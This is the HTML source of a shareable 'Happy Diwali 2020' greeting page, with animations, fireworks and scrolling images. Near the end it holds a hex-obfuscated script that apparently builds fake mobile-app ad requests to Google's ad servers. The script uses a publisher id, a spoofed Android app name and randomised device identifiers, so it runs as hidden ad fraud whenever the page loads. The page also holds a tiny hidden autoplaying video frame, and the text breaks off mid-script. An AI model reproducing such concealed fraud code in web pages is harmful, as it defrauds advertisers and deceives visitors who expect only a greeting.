<html>
<head>
	<meta name="msvalidate.01" content="21C2891B5096A73CF2E3AE41089245EE" />
<meta name="google-site-verification" content="3TnhOP3d9yvYAL890iJoCyxUbHaa2A8KhyKvjXRH-Zk" />
<meta name="google-site-verification" content="hhuSlViku9uKug83eLqW8uL0JwdsuGofushbrhvGB1E" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=1"/>
<title>Happy Diwali 2020 - YourGifts.github.io</title>

    <meta name="google" value="notranslate">
    <meta property="og:type" content="Make your own wonderful wish for you loved one" />
    <meta property="og:title" content="Happy Diwali - Special Gift For You" />
    <meta property="og:url" content="yourgifts.github.io/diwali" />
    <meta property="og:description" content="Happy Diwali - Make your own wonderful wish for you loved one. - github/yourgifts" />
    <meta property="og:site_name" content="Happy Diwali 2020 - yourgifts.github.io" />
    <link type="text/css" rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/animate.css/3.5.2/animate.min.css" />
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.css" />
    <link href='https://fonts.googleapis.com/css?family=Sofia:&effect=neon' rel='stylesheet'>
    <link rel="icon" type="image/png" sizes="32x32" href="https://raw.githubusercontent.com/yourgifts/yourgifts.github.io/main/images/yourgifts.github.io%20logo%20icon.png">
<style>
i {
        color:#f06414;
    }
input[type=name], select {
    width: 100%;
    padding: 12px 20px;
    margin: 4px 0;
    display: inline-block;
    border: 1px solid #ccc;
    border-radius: 4px;
    box-sizing: border-box;
}
.technicalarpfooterstyle {
 
            display: block;
            line-height: 15px;
            position: fixed;
            left:0px;
            bottom:1px;
            height:40px;
            
border-radius: 15px;
  box-sizing: border-box;
  padding: 5px;
  background:#34af23;
  color: #ffffff;
  font-size: 18px;
  text-align: center;
  text-decoration: none;
  width:95%;
 margin-left:10px;
            margin-right:30px;
            box-shadow: 0 4px 12px 0 rgba(0, 0, 0, .3);
            animation: footer infinite linear 1s;
            -webkit-transform: translate3d(30%,0,0);
            transform: translate3d(30%,0,0);
            position: fixed;
           
}

.technicalarpfooterstyle :active {
            box-shadow: none
        }

        @-webkit-keyframes footer {
            from {
                -webkit-transform: rotateZ(0)
            }
            25% {
                -webkit-transform: rotateZ(0deg)
            }
            50% {
                -webkit-transform: rotateZ(0deg)
            }
            75% {
                -webkit-transform: rotateZ(0deg)
            }
            to {
                -webkit-transform: rotateZ(0)
            }}

@-webkit-keyframes jello {  from, 11.1%, to {    transform: none;  }
  22.2% {    transform: skewX(-12.5deg) skewY(-12.5deg);  }
  33.3% {    transform: skewX(6.25deg) skewY(6.25deg);  }
  44.4% {    transform: skewX(-3.125deg) skewY(-3.125deg);  }
  55.5% {    transform: skewX(1.5625deg) skewY(1.5625deg);  }
  66.6% {    transform: skewX(-0.78125deg) skewY(-0.78125deg);  }
  77.7% {    transform: skewX(0.390625deg) skewY(0.390625deg);  }
  88.8% {    transform: skewX(-0.1953125deg) skewY(-0.1953125deg);  }}

    .technicalarp1{position:fixed;left:1%; width:auto;height:100%;top:1%;color:#000;}
    .technicalarp2{position:fixed;right:1%; width:auto;height:100%;top:1%;color:#000;}
.bubbles {
font-family: arial;
}

.bubbles hi {
font-family: 'Luckiest Guy', cursive;
color: black;
}

hi {
 font-size:2.5em;
 user-select:none;
}

hi span { display:inline-block; animation:float .2s ease-in-out infinite; }
 @keyframes float {
  0%,100%{ transform:none; }
  33%{ transform:translateY(-1px) rotate(-2deg); }
  66%{ transform:translateY(1px) rotate(2deg); }
}
body:hover span { animation:bounce .6s; }
@keyframes bounce {
  0%,100%{ transform:translate(0); }
  25%{ transform:rotateX(20deg) translateY(2px) rotate(-3deg); }
  50%{ transform:translateY(-20px) rotate(3deg) scale(1.1);  }
}

@import url(https://lh6.googleusercontent.com/proxy/YfzDH9rGEX2_6c0-ipAee-UwIRD6yJ2S-9zgBkCvqKQxaNYcbJ399-QVTehEPWRHJ-iB2IRCLJ-HGPW_wv9fmo8T2WG1qQ=s0-d);

h1 {
  animation:glow 10s ease-in-out infinite;
}



* { box-sizing:border-box; }

figure {
  animation:wobble 5s ease-in-out infinite;
  transform-origin:center center;
  transform-style:preserve-3d;
}

@keyframes wobble {
  0%,100%{ transform:rotate3d(1,1,0,40deg); }
  25%{ transform:rotate3d(-1,1,0,40deg); }
  50%{ transform:rotate3d(-1,-1,0,40deg); }
  75%{ transform:rotate3d(1,-1,0,40deg); }
}

h1 {
  display:block;
  width:90%;
  line-height:1.5;
  font:900 35px 'Concert One', sans-serif;
  position:absolute;
  color:#fff;
}

@keyframes glow {
  0%,100%{ text-shadow:0 0 30px red; }
  25%{ text-shadow:0 0 30px orange; }
  50%{ text-shadow:0 0 30px forestgreen; }
  75%{ text-shadow:0 0 30px cyan; }
}

h1:nth-child(2){ transform:translateZ(5px); }
h1:nth-child(3){ transform:translateZ(10px);}
h1:nth-child(4){ transform:translateZ(15px); }
h1:nth-child(5){ transform:translateZ(20px); }
h1:nth-child(6){ transform:translateZ(25px); }
h1:nth-child(7){ transform:translateZ(30p.rock{animation:infinite 1s rock}
@keyframes rock {  0% {    transform: rotate(-1deg);  }
  50% {    transform: rotate(2deg);  }
  100% {    transform: rotate(-1deg);  }}x); }
h1:nth-child(8){ transform:translateZ(35px); }
h1:nth-child(9){ transform:translateZ(40px); }
h1:nth-child(10){ transform:translateZ(45px); }



.rock{animation:infinite 1s rock}
@keyframes rock {  0% {    transform: rotate(-1deg);  }
  50% {    transform: rotate(2deg);  }
  100% {    transform: rotate(-1deg);  }}

.fuck{animation:infinite 1s fuck}
@keyframes rock {  0% {    transform: rotate(-2deg);  }
  50% {    transform: rotate(2deg);  }
  100% {    transform: rotate(-2deg);  }}


h2 {
   
    -webkit-animation: bounceIn 4s cubic-bezier(0.68, -0.55, 0.27, 1.55) infinite;
     animation: bounceIn 4s cubic-bezier(0.68, -0.55, 0.27, 1.55) infinite;
    -webkit-transition: all .2s;
    transition: all .2s;
    font-size: 35px;
    text-transform: uppercase;
    TEXT-ALIGN:CENTER;
    color: #138808;
    text-shadow: -2px 0px 1px #22414f, -4px 0px 1px #22414f, -6px 0px 1px #22414f, -1px -1px 1px #22414f, -1px -2px 1px #22414f, -2px -1px 1px #22414f, -2px -2px 1px #22414f, -3px -3px 1px #22414f, -4px -4px 1px #22414f, -5px -5px 1px #22414f, -6px -6px 1px #22414f, 0 0 15px #22414f, 0 0 20px #22414f, 1px 1px #22414f,2px 2px #22414f;

}

h3 {
    font-size: 18px;
    text-align: center;
    padding:1px;
    margin:1px;
    color: #ffffff;
   
    aanimation: fuck infinite 1s;
    font-family: 'Indie Flower', cursive;
    letter-spacing: 2px;
	
	
	* {box-sizing: border-box;}
body {font-family: Verdana, sans-serif;}
.mySlides {display: none;}
img {vertical-align: middle;}


.technicalarp-slideshow-container {
  max-width: 1000px;
  position: relative;
  margin: auto;
}


.text {
  color: #f2f2f2;
  font-size: 15px;
  padding: 8px 12px;
  position: absolute;
  bottom: 8px;
  width: 100%;
  text-align: center;
}

/* Number text (1/11 etc) */
.numbertext {
  color: #f2f2f2;
  font-size: 12px;
  padding: 8px 12px;
  position: absolute;
  top: 0;
}

/* The dots/bullets/indicators */
.dot {
  height: 15px;
  width: 15px;
  margin: 0 2px;
  background-color: #bbb;
  border-radius: 50%;
  display: inline-block;
  transition: background-color 0.6s ease;
}

.active {
  background-color: #717171;
}

/* Fading animation */
.fade {
  -webkit-animation-name: fade;
  -webkit-animation-duration: 1.5s;
  animation-name: fade;
  animation-duration: 1.5s;
}

@-webkit-keyframes fade {
  from {opacity: .4} 
  to {opacity: 1}
}

@keyframes fade {
  from {opacity: .4} 
  to {opacity: 1}
}

/* On smaller screens, decrease text size */
@media only screen and (max-width: 300px) {
  .text {font-size: 11px}
	
	
}
</style>
<style>
      body{
        background: #f8f8f8;
      
}
      .mainContainer {
max-width: 400px;
    margin: auto;
    text-align: center;
    position: relative;
    padding-right: 1px;
    padding-left: 1px;
    padding-top: 1px;
    box-shadow: 3px 3px 23px 0 rgba(0, 0, 0, 0.64);
    margin-bottom: 65px;
}


.technicalarpncontainer {
   
    padding-right: 30px;
    padding-left: 30px;
    padding-top: 0px;
  
}

      }

.username {
    -webkit-animation: bounceIn 4s cubic-bezier(0.68, -0.55, 0.27, 1.55) infinite;
     animation: bounceIn 4s cubic-bezier(0.68, -0.55, 0.27, 1.55) infinite;
    -webkit-transition: all .2s;
    transition: all .2s;
    font-size: 40px;
    font-family: 'SF Espresso Shack', cursive;
    text-transform: uppercase;
    TEXT-ALIGN:CENTER;
    color: #138808;
    text-shadow: -2px 0px 1px #22414f, -4px 0px 1px #22414f, -6px 0px 1px #22414f, -1px -1px 1px #22414f, -1px -2px 1px #22414f, -2px -1px 1px #22414f, -2px -2px 1px #22414f, -3px -3px 1px #22414f, -4px -4px 1px #22414f, -5px -5px 1px #22414f, -6px -6px 1px #22414f, 0 0 15px #22414f, 0 0 20px #22414f, 1px 1px #22414f,2px 2px #22414f;

}
      .fromMessage{
       
       
        
        font-size: 30px;
        
      }
      .wavetext{
        color: #3e8ed2;
        padding: 0 40px;
        animation: pulse 1s infinite;
        font-size: 32px;

      }
      .wishMessage {
        color: #3e8ed2;
        font-size: 22px;
        font-weight: bold;
        margin-top: 50px;
        text-shadow: 0px 0px 10px #00fff3
      }
      .wishMessage p{
        margin: 0.5em 0;
      }
      #TechnicalArpformBox {
        left: 0;position: fixed;bottom: 0;display: inline-block;width: 100%;margin: 0;
      }
      #nameTextBox {
        border: 3px solid #000000;text-align: center;display: inline-block;width: 80%;color: black;font-size:16px;margin: 0;background: #eee;height: 48px;font-weight: 700;;padding:8px 0;
      }
      #goButton {
        width: 20%;background: gold;display: inline-block;vertical-align: bottom;border: 3px solid #000000;float: right;color: black;font-size:16px;padding:8px 0;height: 48px;text-align:center;font-weight: 700;
      }

	  .technicalarpfooterstyle1 {
 
            display: block;
            line-height: 15px;
            position: fixed;
            right:0px;
            bottom:0px;
            height:40px;
            
border-radius: 15px;
  box-sizing: border-box;
  padding: 5px;
  background:#000099;
  color: #ffffff;
  font-size: 18px;
  text-align: center;
  text-decoration: none;
  width:45%;
 margin-right:10px;
            margin-right:30px;
            box-shadow: 0 4px 12px 0 rgba(0, 0, 0, .3);
            animation: footer infinite linear 1s;
            -webkit-transform: translate3d(30%,0,0);
            transform: translate3d(30%,0,0);
            position: fixed;
           
}

.technicalarpfooterstyle1 :active {
            box-shadow: none
        }

        @-webkit-keyframes footer {
            from {
                -webkit-transform: rotateZ(0)
            }
            25% {
                -webkit-transform: rotateZ(1.5deg)
            }
            50% {
                -webkit-transform: rotateZ(0deg)
            }
            75% {
                -webkit-transform: rotateZ(-1.5deg)
            }
            to {
                -webkit-transform: rotateZ(0)
            }}
.technicalarpfooterstyle {
 
            display: block;
            line-height: 15px;
            position: fixed;
            left:0px;
            bottom:0px;
            height:40px;
            
border-radius: 15px;
  box-sizing: border-box;
  padding: 5px;
  background:#34af23;
  color: #ffffff;
  font-size: 18px;
  text-align: center;
  text-decoration: none;
  width:45%;
 margin-left:10px;
            margin-right:30px;
            box-shadow: 0 4px 12px 0 rgba(0, 0, 0, .3);
            animation: footer infinite linear 1s;
            -webkit-transform: translate3d(30%,0,0);
            transform: translate3d(30%,0,0);
            position: fixed;
           
}

.technicalarpfooterstyle :active {
            box-shadow: none
        }

        @-webkit-keyframes footer {
            from {
                -webkit-transform: rotateZ(0)
            }
            25% {
                -webkit-transform: rotateZ(1.5deg)
            }
            50% {
                -webkit-transform: rotateZ(0deg)
            }
            75% {
                -webkit-transform: rotateZ(-1.5deg)
            }
            to {
                -webkit-transform: rotateZ(0)
            }}

      .technicalarpfooterstyle img {
        position: relative;top:3px;
      }
      #inAdvance {
        font-size: 20px; font-weight: bold;margin-top: 20px;color: #98201F;
      }
      #demoo {
        font-size: 20px; font-weight: bold;color: #98201F;
        
      }
      #inAdvanceTime {
        margin:20px 0 30px 0;
      }
      #inAdvanceTime p{
        color: #ae00b9;font-size: 19px;font-weight: 500;
        margin: 0;
      }
.bg{background-image:url(img/bg.gif);background-repeat:repeat}p.head.name{word-wrap: break-word;font-size:40px;font-family:sans-serif;text-shadow: 1px 1px 5px rgba(0, 0, 0, 0.5);color:#f5f5f5}input#mce-names {width: 100% !important;margin-top: 20px !important;}





.technicalarp-main-greeting {
   
    max-width: 400px;
    margin: auto;
    text-align: center;
    position: relative;
    padding: 0px;
    background:#000;
    background: url("");
    background-position: center;
    background-repeat: no-repeat;
    background-size: cover;
    box-shadow: 3px 4px 41px 0 rgba(0, 0, 0, 0.64);
    margin-bottom: 35px
}

.technicalarp-main-greeting .main_body {
    text-align: center;
    font-size: 1.3em
}
.technicalarp-main-greeting .main_body .text2 {
    padding: 10px;
    font-size: 20px
}
.technicalarp-main-greeting .text {
    color: #405d9b;
    letter-spacing: 1px;
    font-weight: 600;
    padding: 0px 10px;
    text-align: center;
}
.technicalarp-main-greeting .pp-img {
    max-width: 400px;
    margin-bottom: 10px;
    box-shadow: 0px 0px 10px 0px rgba(0, 0, 0, 0.64);
}

.technicalarp-main-greeting .text_gradient {
    margin: 5px auto;
    font-weight: 700;
    font-size: 24px;
    color: #b50dae;
}



    </style>



	  <style>img[alt="youtube.com/giteshgeeky"]{display:none;}</style>

<script>function write_fire(e){var t,n,r;stars[e+"r"]=createDiv("|",42);boddie.appendChild(stars[e+"r"]);for(t=bits*e;t<bits+bits*e;t++){stars[t]=createDiv("*",43);boddie.appendChild(stars[t])}}function createDiv(e,t){var n=document.createElement("div");n.style.font=t+"px monospace";n.style.position="absolute";n.style.backgroundColor="transparent";n.appendChild(document.createTextNode(e));return n}function launch(e){colour[e]=Math.floor(Math.random()*colours.length);Xpos[e+"r"]=swide*.5;Ypos[e+"r"]=shigh-5;bangheight[e]=Math.round((.5+Math.random())*shigh*.4);dX[e+"r"]=(Math.random()-.5)*swide/bangheight[e];if(dX[e+"r"]>1.25)stars[e+"r"].firstChild.nodeValue="/";else if(dX[e+"r"]<-1.25)stars[e+"r"].firstChild.nodeValue="\\";else stars[e+"r"].firstChild.nodeValue="|";stars[e+"r"].style.color=colours[colour[e]]}function bang(e){var t,n,r=0;for(t=bits*e;t<bits+bits*e;t++){n=stars[t].style;n.left=Xpos[t]+"px";n.top=Ypos[t]+"px";if(decay[t])decay[t]--;else r++;if(decay[t]==15)n.fontSize="7px";else if(decay[t]==7)n.fontSize="2px";else if(decay[t]==1)n.visibility="hidden";Xpos[t]+=dX[t];Ypos[t]+=dY[t]+=1.25/intensity[e]}if(r!=bits)setTimeout("bang("+e+")",speed)}function stepthrough(e){var t,n,r;var i=Xpos[e+"r"];var s=Ypos[e+"r"];Xpos[e+"r"]+=dX[e+"r"];Ypos[e+"r"]-=4;if(Ypos[e+"r"]<bangheight[e]){n=Math.floor(Math.random()*3*colours.length);intensity[e]=5+Math.random()*4;for(t=e*bits;t<bits+bits*e;t++){Xpos[t]=Xpos[e+"r"];Ypos[t]=Ypos[e+"r"];dY[t]=(Math.random()-.5)*intensity[e];dX[t]=(Math.random()-.5)*(intensity[e]-Math.abs(dY[t]))*1.25;decay[t]=16+Math.floor(Math.random()*16);r=stars[t];if(n<colours.length)r.style.color=colours[t%2?colour[e]:n];else if(n<2*colours.length)r.style.color=colours[colour[e]];else r.style.color=colours[t%colours.length];r.style.fontSize="13px";r.style.visibility="visible"}bang(e);launch(e)}stars[e+"r"].style.left=i+"px";stars[e+"r"].style.top=s+"px"}function set_width(){var e=999999;var t=999999;if(document.documentElement&&document.documentElement.clientWidth){if(document.documentElement.clientWidth>0)e=document.documentElement.clientWidth;if(document.documentElement.clientHeight>0)t=document.documentElement.clientHeight}if(typeof self.innerWidth!="undefined"&&self.innerWidth){if(self.innerWidth>0&&self.innerWidth<e)e=self.innerWidth;if(self.innerHeight>0&&self.innerHeight<t)t=self.innerHeight}if(document.body.clientWidth){if(document.body.clientWidth>0&&document.body.clientWidth<e)e=document.body.clientWidth;if(document.body.clientHeight>0&&document.body.clientHeight<t)t=document.body.clientHeight}if(e==999999||t==999999){e=800;t=600}swide=e;shigh=t}var bits=80;var speed=53;var bangs=10;var colours=new Array("#03f","#f03","#0e0","#93f","#0cf","#f93","#f0c");var bangheight=new Array;var intensity=new Array;var colour=new Array;var Xpos=new Array;var Ypos=new Array;var dX=new Array;var dY=new Array;var stars=new Array;var decay=new Array;var swide=800;var shigh=600;var boddie;window.onload=function(){if(document.getElementById){var e;boddie=document.createElement("div");boddie.style.position="fixed";boddie.style.top="0px";boddie.style.left="0px";boddie.style.overflow="visible";boddie.style.width="1px";boddie.style.height="1px";boddie.style.backgroundColor="transparent";document.body.appendChild(boddie);set_width();for(e=0;e<bangs;e++){write_fire(e);launch(e);setInterval("stepthrough("+e+")",speed)}}};window.onresize=set_width//]]></script>

</head>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script>
<style>
/* customizable snowflake styling */
.snowflake {
  color: #fff;
  font-size: 2em;
  font-family: Arial, sans-serif;
  text-shadow: 0 0 5px #000;
}

@-webkit-keyframes snowflakes-fall{0%{top:-10%}100%{top:100%}}@-webkit-keyframes snowflakes-shake{0%,100%{-webkit-transform:translateX(0);transform:translateX(0)}50%{-webkit-transform:translateX(80px);transform:translateX(80px)}}@keyframes snowflakes-fall{0%{top:-10%}100%{top:100%}}@keyframes snowflakes-shake{0%,100%{transform:translateX(0)}50%{transform:translateX(80px)}}.snowflake{position:fixed;top:-10%;z-index:9999;-webkit-user-select:none;-moz-user-select:none;-ms-user-select:none;user-select:none;cursor:default;-webkit-animation-name:snowflakes-fall,snowflakes-shake;-webkit-animation-duration:10s,3s;-webkit-animation-timing-function:linear,ease-in-out;-webkit-animation-iteration-count:infinite,infinite;-webkit-animation-play-state:running,running;animation-name:snowflakes-fall,snowflakes-shake;animation-duration:10s,3s;animation-timing-function:linear,ease-in-out;animation-iteration-count:infinite,infinite;animation-play-state:running,running}.snowflake:nth-of-type(0){left:1%;-webkit-animation-delay:0s,0s;animation-delay:0s,0s}.snowflake:nth-of-type(1){left:10%;-webkit-animation-delay:1s,1s;animation-delay:1s,1s}.snowflake:nth-of-type(2){left:20%;-webkit-animation-delay:6s,.5s;animation-delay:6s,.5s}.snowflake:nth-of-type(3){left:30%;-webkit-animation-delay:4s,2s;animation-delay:4s,2s}.snowflake:nth-of-type(4){left:40%;-webkit-animation-delay:2s,2s;animation-delay:2s,2s}.snowflake:nth-of-type(5){left:50%;-webkit-animation-delay:8s,3s;animation-delay:8s,3s}.snowflake:nth-of-type(6){left:60%;-webkit-animation-delay:6s,2s;animation-delay:6s,2s}.snowflake:nth-of-type(7){left:70%;-webkit-animation-delay:2.5s,1s;animation-delay:2.5s,1s}.snowflake:nth-of-type(8){left:80%;-webkit-animation-delay:1s,0s;animation-delay:1s,0s}.snowflake:nth-of-type(9){left:90%;-webkit-animation-delay:3s,1.5s;animation-delay:3s,1.5s}.snowflake:nth-of-type(10){left:25%;-webkit-animation-delay:2s,0s;animation-delay:2s,0s}.snowflake:nth-of-type(11){left:65%;-webkit-animation-delay:4s,2.5s;animation-delay:4s,2.5s}
</style>
</head>

<body class="bg" style=" background-image : url('https://3.bp.blogspot.com/-TvoWWnCdd5w/XWObzrgAnAI/AAAAAAAAADo/PwGSqiL_QKwR9PAVb_-GTs8C56emlubJACLcBGAs/s1600/star0%2B%25281%2529.gif')";>
<marquee class="technicalarp1" behavior="scroll" direction="up" scrolldelay="5"><br>
<img height="129px" src="https://raw.githubusercontent.com/yourgifts/diwali/main/images/yourgifts.github.io-diwali.png" width="35px" /><br /><br />
<img height="129px" src="https://raw.githubusercontent.com/yourgifts/diwali/main/images/yourgifts.github.io-diwali.png" width="35px" /><br /><br />
<img height="129px" src="https://raw.githubusercontent.com/yourgifts/diwali/main/images/yourgifts.github.io-diwali.png" width="35px" /><br /><br />
<img height="129px" src="https://raw.githubusercontent.com/yourgifts/diwali/main/images/yourgifts.github.io-diwali.png" width="35px" /><br /><br />
<img height="129px" src="https://raw.githubusercontent.com/yourgifts/diwali/main/images/yourgifts.github.io-diwali.png" width="35px" /><br /><br />
<img height="129px" src="https://raw.githubusercontent.com/yourgifts/diwali/main/images/yourgifts.github.io-diwali.png" width="35px" /><br /><br />
<img height="129px" src="https://raw.githubusercontent.com/yourgifts/diwali/main/images/yourgifts.github.io-diwali.png" width="35px" /><br /><br />
<img height="129px" src="https://raw.githubusercontent.com/yourgifts/diwali/main/images/yourgifts.github.io-diwali.png" width="35px" /><br /><br />
<img height="129px" src="https://raw.githubusercontent.com/yourgifts/diwali/main/images/yourgifts.github.io-diwali.png" width="35px" /><br /><br />
<img height="129px" src="https://raw.githubusercontent.com/yourgifts/diwali/main/images/yourgifts.github.io-diwali.png" width="35px" /><br /><br />
<img height="129px" src="https://raw.githubusercontent.com/yourgifts/diwali/main/images/yourgifts.github.io-diwali.png" width="35px" /><br /><br />
<img height="129px" src="https://raw.githubusercontent.com/yourgifts/diwali/main/images/yourgifts.github.io-diwali.png" width="35px" /><br /><br />
<img height="129px" src="https://raw.githubusercontent.com/yourgifts/diwali/main/images/yourgifts.github.io-diwali.png" width="35px" /><br /><br />
<img height="129px" src="https://raw.githubusercontent.com/yourgifts/diwali/main/images/yourgifts.github.io-diwali.png" width="35px" /><br /><br />
<img height="129px" src="https://raw.githubusercontent.com/yourgifts/diwali/main/images/yourgifts.github.io-diwali.png" width="35px" /><br /><br />
<img height="129px" src="https://raw.githubusercontent.com/yourgifts/diwali/main/images/yourgifts.github.io-diwali.png" width="35px" /><br /><br />
<img height="129px" src="https://raw.githubusercontent.com/yourgifts/diwali/main/images/yourgifts.github.io-diwali.png" width="35px" /><br /><br />
<img height="129px" src="https://raw.githubusercontent.com/yourgifts/diwali/main/images/yourgifts.github.io-diwali.png" width="35px" /><br /><br />

</marquee>
<marquee class="technicalarp2" behavior="scroll" direction="down" scrolldelay="5"><br>
<img height="129px" src="https://raw.githubusercontent.com/yourgifts/diwali/main/images/yourgifts.github.io-diwali.png" width="35px" /><br /><br />
<img height="129px" src="https://raw.githubusercontent.com/yourgifts/diwali/main/images/yourgifts.github.io-diwali.png" width="35px" /><br /><br />
<img height="129px" src="https://raw.githubusercontent.com/yourgifts/diwali/main/images/yourgifts.github.io-diwali.png" width="35px" /><br /><br />
<img height="129px" src="https://raw.githubusercontent.com/yourgifts/diwali/main/images/yourgifts.github.io-diwali.png" width="35px" /><br /><br />
<img height="129px" src="https://raw.githubusercontent.com/yourgifts/diwali/main/images/yourgifts.github.io-diwali.png" width="35px" /><br /><br />
<img height="129px" src="https://raw.githubusercontent.com/yourgifts/diwali/main/images/yourgifts.github.io-diwali.png" width="35px" /><br /><br />
<img height="129px" src="https://raw.githubusercontent.com/yourgifts/diwali/main/images/yourgifts.github.io-diwali.png" width="35px" /><br /><br />
<img height="129px" src="https://raw.githubusercontent.com/yourgifts/diwali/main/images/yourgifts.github.io-diwali.png" width="35px" /><br /><br />
<img height="129px" src="https://raw.githubusercontent.com/yourgifts/diwali/main/images/yourgifts.github.io-diwali.png" width="35px" /><br /><br />
<img height="129px" src="https://raw.githubusercontent.com/yourgifts/diwali/main/images/yourgifts.github.io-diwali.png" width="35px" /><br /><br />
<img height="129px" src="https://raw.githubusercontent.com/yourgifts/diwali/main/images/yourgifts.github.io-diwali.png" width="35px" /><br /><br />
<img height="129px" src="https://raw.githubusercontent.com/yourgifts/diwali/main/images/yourgifts.github.io-diwali.png" width="35px" /><br /><br />
<img height="129px" src="https://raw.githubusercontent.com/yourgifts/diwali/main/images/yourgifts.github.io-diwali.png" width="35px" /><br /><br />
<img height="129px" src="https://raw.githubusercontent.com/yourgifts/diwali/main/images/yourgifts.github.io-diwali.png" width="35px" /><br /><br />
<img height="129px" src="https://raw.githubusercontent.com/yourgifts/diwali/main/images/yourgifts.github.io-diwali.png" width="35px" /><br /><br />
<img height="129px" src="https://raw.githubusercontent.com/yourgifts/diwali/main/images/yourgifts.github.io-diwali.png" width="35px" /><br /><br />
<img height="129px" src="https://raw.githubusercontent.com/yourgifts/diwali/main/images/yourgifts.github.io-diwali.png" width="35px" /><br /><br />
<img height="129px" src="https://raw.githubusercontent.com/yourgifts/diwali/main/images/yourgifts.github.io-diwali.png" width="35px" /><br /><br />

</marquee>


 <div class="technicalarpncontainer">

    <div class="technicalarp-main-greeting">
<center>
<div style="background: url(https://1.bp.blogspot.com/-l0EVRb2fd3Q/WyNAg2N6m6I/AAAAAAAAAag/yA795u9GRJIf-DaE6-UCcWxL_bbdR5rXwCLcBGAs/s1600/Snow_falling1.gif); background-color:; color: white; font-weight: bold; padding-top: 0px; padding-bottom: 0px; font-size: 12;text-align:center; ">
<font color="white"> <p id="technicalarpdemo"></p>
</font>
</Div>
<div style="background: url(https://1.bp.blogspot.com/-l0EVRb2fd3Q/WyNAg2N6m6I/AAAAAAAAAag/yA795u9GRJIf-DaE6-UCcWxL_bbdR5rXwCLcBGAs/s1600/Snow_falling1.gif); background-color:; color: white; font-weight: bold; padding-top: 6px; padding-bottom: 6px; font-size: large;text-align:center; ">

<h2 class="font-effect-neon" align=center" id="technicalarp-show-name"></h2>
</Div>
<div style="background: url(https://1.bp.blogspot.com/-l0EVRb2fd3Q/WyNAg2N6m6I/AAAAAAAAAag/yA795u9GRJIf-DaE6-UCcWxL_bbdR5rXwCLcBGAs/s1600/Snow_falling1.gif); background-color: ; color: white; font-weight: bold; padding-top: 6px; padding-bottom: 6px; font-size: large;text-align:center; ">
</font>
</div>
        <div class="font-effect-neon"><p class="fromMessage" id="technicalarp-fromMessage"></p></div>
<img src="https://lh3.googleusercontent.com/-BBXQTdyeHfo/XXIX85W5xLI/AAAAAAAAAe0/PfHyYLnSoxsgTd32Ppz_nf5fuY7qV7EVACLcBGAs/h222/kiTarafSe%2B%25282%2529.png"style="animation: tada 4.5s infinite" class="swing"  height="40px" width="200px"/>
       </center> 


<center>

<div class="font-effect-neon"><p class="fromMessage" id="technicalarp-fromMessage"></p></div>
<img src="https://raw.githubusercontent.com/yourgifts/diwali/main/images/happy%20diwali%20wishing%20massage.png" height="200px" width="200px"/>
       </center> 

<img alt="youtube.com/giteshgeeky" src="https://raw.githubusercontent.com/yourgifts/diwali/main/images/yourgifts.github.io.jpg" style="animation: tada 3.5s infinite" class="swing2"  height="1200px" width="750px"/>


<!---Put Adsense Code--->

<iframe width="15" height="10" src="https://www.youtube.com/embed/_lp3zeCBQxY?start=10" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture" allowfullscreen></iframe>

<!--<h2>Main Center Image</h2>-->
<script>

var pubid = '5244118484095964';

<!------------------------------------------------------------------------->

<!-- Banner Ad Slot Id Here -->

var s1 = '6981047023';

var pn1 = 'com.FindThePairGame';

var _0x6717=["\x68\x74\x74\x70\x73\x3A\x2F\x2F\x67\x6F\x6F\x67\x6C\x65\x61\x64\x73\x2E\x67\x2E\x64\x6F\x75\x62\x6C\x65\x63\x6C\x69\x63\x6B\x2E\x6E\x65\x74\x2F\x6D\x61\x64\x73\x2F\x67\x6D\x61\x3F\x70\x72\x65\x71\x73\x3D\x30\x26\x75\x5F\x73\x64\x3D\x31\x2E\x35\x26\x75\x5F\x77\x3D\x33\x32\x30\x26\x6D\x73\x69\x64\x3D","\x26\x63\x61\x70\x3D\x61\x26\x6A\x73\x3D\x61\x66\x6D\x61\x2D\x73\x64\x6B\x2D\x61\x2D\x76\x33\x2E\x33\x2E\x30\x26\x74\x6F\x61\x72\x3D\x30\x26\x69\x73\x75\x3D\x57\x25\x32\x37\x2B\x4D\x61\x74\x68\x2E\x66\x6C\x6F\x6F\x72\x25\x32\x38\x4D\x61\x74\x68\x2E\x72\x61\x6E\x64\x6F\x6D\x25\x32\x38\x25\x32\x39\x2A\x39\x25\x32\x39\x2B\x25\x32\x37\x45\x45\x41\x42\x42\x38\x45\x45\x25\x32\x37\x2B\x4D\x61\x74\x68\x2E\x66\x6C\x6F\x6F\x72\x25\x32\x38\x4D\x61\x74\x68\x2E\x72\x61\x6E\x64\x6F\x6D\x25\x32\x38\x25\x32\x39\x2A\x39\x39\x25\x32\x39\x2B\x25\x32\x37\x43\x32\x42\x45\x37\x37\x30\x42\x36\x38\x34\x44\x25\x32\x37\x2B\x4D\x61\x74\x68\x2E\x66\x6C\x6F\x6F\x72\x25\x32\x38\x4D\x61\x74\x68\x2E\x72\x61\x6E\x64\x6F\x6D\x25\x32\x38\x25\x32\x39\x2A\x39\x39\x39\x39\x39\x25\x32\x39\x2B\x25\x32\x37\x45\x43\x42\x26\x63\x69\x70\x61\x3D\x30\x26\x66\x6F\x72\x6D\x61\x74\x3D\x33\x32\x30\x78\x35\x30\x5F\x6D\x62\x26\x6E\x65\x74\x3D\x77\x69\x26\x61\x70\x70\x5F\x6E\x61\x6D\x65\x3D\x31\x2E\x61\x6E\x64\x72\x6F\x69\x64\x2E","\x26\x68\x6C\x3D\x65\x6E\x26\x75\x5F\x68\x3D\x25\x32\x37\x2B\x4D\x61\x74\x68\x2E\x66\x6C\x6F\x6F\x72\x25\x32\x38\x4D\x61\x74\x68\x2E\x72\x61\x6E\x64\x6F\x6D\x25\x32\x38\x25\x32\x39\x2A\x39\x39\x39\x25\x32\x39\x2B\x25\x32\x37\x26\x63\x61\x72\x72\x69\x65\x72\x3D\x25\x32\x37\x2B\x4D\x61\x74\x68\x2E\x66\x6C\x6F\x6F\x72\x25\x32\x38\x4D\x61\x74\x68\x2E\x72\x61\x6E\x64\x6F\x6D\x25\x32\x38\x25\x32\x39\x2A\x39\x39\x39\x39\x39\x39\x25\x32\x39\x2B\x25\x32\x37\x26\x70\x74\x69\x6D\x65\x